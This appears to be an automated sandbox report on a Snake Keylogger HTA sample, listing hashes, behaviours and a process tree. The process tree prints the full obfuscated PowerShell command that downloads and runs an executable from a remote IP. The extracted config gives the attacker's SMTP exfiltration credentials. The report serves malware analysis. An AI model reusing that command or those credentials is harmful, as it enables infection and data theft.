Analysis
-
max time kernel
113s -
max time network
114s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
28-09-2024 01:09
Static task
static1
Behavioral task
behavioral1
Sample
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
Resource
win10v2004-20240802-en
General
-
Target
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta
-
Size
115KB
-
MD5
17116a0f43508549998ef6618154d77a
-
SHA1
e71af8b0489263e476521a5fd6e22e5511369c4d
-
SHA256
1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64
-
SHA512
a6824f19100e0fd4c996ab8db64875fb1c0c0e4d045792793b45ad1e93cb358c6746289209d8d1f4634c6ebed9ade9e43a5b3407856780e7e60954efc249e9d9
-
SSDEEP
96:Ea+M7wmf6PCZ60NUrnPmeobQk9B6/A6I6L1j+Z668AT:Ea+Qwmf6PCZ6kUTWfz6Y6dKZ6+T
Malware Config
Extracted
snakekeylogger
Protocol: smtp- Host:
mail.teilecar.com - Port:
587 - Username:
[email protected] - Password:
Manta924porsche=911 - Email To:
[email protected]
Signatures
-
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
-
Snake Keylogger payload 1 IoCs
resource yara_rule behavioral2/memory/3212-83-0x0000000000400000-0x0000000000426000-memory.dmp family_snakekeylogger -
Blocklisted process makes network request 1 IoCs
flow pid Process 14 4196 powershell.exe -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 1 IoCs
pid Process 4196 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Control Panel\International\Geo\Nation mshta.exe -
Executes dropped EXE 1 IoCs
pid Process 4064 dllhost.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe Key opened \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 21 checkip.dyndns.org -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral2/files/0x00080000000234b3-68.dat autoit_exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 4064 set thread context of 3212 4064 dllhost.exe 92 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 7 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language dllhost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegSvcs.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 4196 powershell.exe 4196 powershell.exe 3212 RegSvcs.exe 3212 RegSvcs.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 4064 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 4196 powershell.exe Token: SeDebugPrivilege 3212 RegSvcs.exe -
Suspicious use of FindShellTrayWindow 4 IoCs
pid Process 4064 dllhost.exe 4064 dllhost.exe 4064 dllhost.exe 4064 dllhost.exe -
Suspicious use of SendNotifyMessage 4 IoCs
pid Process 4064 dllhost.exe 4064 dllhost.exe 4064 dllhost.exe 4064 dllhost.exe -
Suspicious use of WriteProcessMemory 19 IoCs
description pid Process procid_target PID 876 wrote to memory of 3676 876 mshta.exe 82 PID 876 wrote to memory of 3676 876 mshta.exe 82 PID 876 wrote to memory of 3676 876 mshta.exe 82 PID 3676 wrote to memory of 4196 3676 cmd.exe 84 PID 3676 wrote to memory of 4196 3676 cmd.exe 84 PID 3676 wrote to memory of 4196 3676 cmd.exe 84 PID 4196 wrote to memory of 2340 4196 powershell.exe 85 PID 4196 wrote to memory of 2340 4196 powershell.exe 85 PID 4196 wrote to memory of 2340 4196 powershell.exe 85 PID 2340 wrote to memory of 3180 2340 csc.exe 86 PID 2340 wrote to memory of 3180 2340 csc.exe 86 PID 2340 wrote to memory of 3180 2340 csc.exe 86 PID 4196 wrote to memory of 4064 4196 powershell.exe 89 PID 4196 wrote to memory of 4064 4196 powershell.exe 89 PID 4196 wrote to memory of 4064 4196 powershell.exe 89 PID 4064 wrote to memory of 3212 4064 dllhost.exe 92 PID 4064 wrote to memory of 3212 4064 dllhost.exe 92 PID 4064 wrote to memory of 3212 4064 dllhost.exe 92 PID 4064 wrote to memory of 3212 4064 dllhost.exe 92 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-523280732-2327480845-3730041215-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 RegSvcs.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\1c6d98ce8a37adc665452a1ca4bfa1fd5b347de7654578503527e28e90275f64.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:876 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/c POwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3676 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exePOwerSheLl -eX BypASs -nop -W 1 -c DevIceCrEdeNTiAldEplOymENT.Exe ; Iex($(iEX('[sYStem.tEXt.ENcoDINg]'+[char]0x3a+[ChAR]0X3a+'UTf8.GEtStRiNG([SyStem.cOnvErt]'+[char]0x3A+[char]0x3a+'FROMBasE64STRIng('+[CHAr]0X22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURkLXRZcEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVNYkVSZEVmSW5JVGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24uZExsIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmNzY1NJTSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBaQ3FpWEIsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUWssdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxvSkRMcGx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGopOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuZEdHIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FU3BBY0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBya1lBRVF4ekt4ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRUOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuNi82MDAvZGxsaG9zdC5leGUiLCIkRU52OkFQUERBVEFcZGxsaG9zdC5leGUiLDAsMCk7c1RBclQtU0xlRVAoMyk7U3RhUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGRsbGhvc3QuZXhlIg=='+[CHAR]0X22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4196 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\244zaul5\244zaul5.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2340 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9DA7.tmp" "c:\Users\Admin\AppData\Local\Temp\244zaul5\CSCE47F655F45CD42D29CBD7DBA2D2F98D4.TMP"5⤵
- System Location Discovery: System Language Discovery
PID:3180
-
-
-
C:\Users\Admin\AppData\Roaming\dllhost.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"C:\Users\Admin\AppData\Roaming\dllhost.exe"5⤵
- Accesses Microsoft Outlook profiles
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:3212
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
3KB
MD5134b575ab21914e6fccd5e5c25c758fb
SHA1d6e748caedc9940b2a916ead1e1b7a464cbb6030
SHA256f6e6bd0571f4865455f24ed1400453e7a7ec3cbc905353df8828941eedd76242
SHA512854230c4f2b4fa27d3c1f3c4efd7e663d2c5f7559549f202cb37aea62d19413c2f738c4917587c5951b45449979a939c9436653e49150769465b39b4c166711a
-
Filesize
1KB
MD53a546f9ad4bb98b1fdc284fb275d891d
SHA11b05e0c9bce63e392619ce66c7f35a4ec65a0956
SHA256b0dff3ea778bf5e5caaf0bfbc6b0e8ff5aee71a2ffd172862cbfa782e6c8ca47
SHA51299cc28ee75ea90b1f92c16515c35f36c0ba8b8210da1f58072f637c7d66072fecfd80f59db350a1d037961d5d140e961833e19ded728f37e95d9d276db868e18
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
956KB
MD5249f4ca7f1cc801c87cebd0cdf0b398e
SHA11241f91fa9239ed0553c33f6d3651644813f6f84
SHA256b639e9680b5ac670c7b58863479c1cf9c7bea436aee481fa9729c6a82508e556
SHA5120b6ae1f507b5599f9fb651576e12ae378b66111193623d806f0e6266e8ee93f1fa5dedd4d4b96f3360fecc81962b76e9bacc7c1096a96df5b33fbd64aa6a18d6
-
Filesize
475B
MD574ac079a164eedfd18ee0237dead2da7
SHA162575f712ded8ea2637ee5e5eda8ae9cf2919dc1
SHA2566c72d2a89a0a1d35a067d9322c4c94503d5a75a2e6308cbf9b7bc95e9396f615
SHA5127994aaef91f02e10fd65e782063492a1658e9b1e6e6ffa3a54fce1ab14b39c19bbd3b61cea46908f87cfde0466ef53e3be352c003db797bef0c9f67875285dbb
-
Filesize
369B
MD5495956e5c2c6505558278efd3cd488b8
SHA1c7f6bde66627d3055adf381628c660cfc84bbe42
SHA25616991ad6250c5b83ef6dbc5e9f023240cd257071af10518a4c7b1e8ff711737c
SHA51233011d1951174e424650eb1dbb745552cc3abdbe91639f774d5109b2704e8fdd9b07b7a7b61b43cabad9352c2ec2b640cfaa04ae90a9d20ef42b156ab762d304
-
Filesize
652B
MD5ed2e65d899e3cddb0e764502675b6ce9
SHA110a00bf4b23e3a091deed8ea633169fa58aa4a49
SHA25692f1288f2372ee1dbe05316f302a2f4d35a877b655f3bc7330c572dfcba57681
SHA5124529fc479c86c7b137daebceea31060a352575c413175ed1291ac1783e6bedd573604344fdc8889564ede290dc1219ee75098b326d09008f6dc675cf97beed3f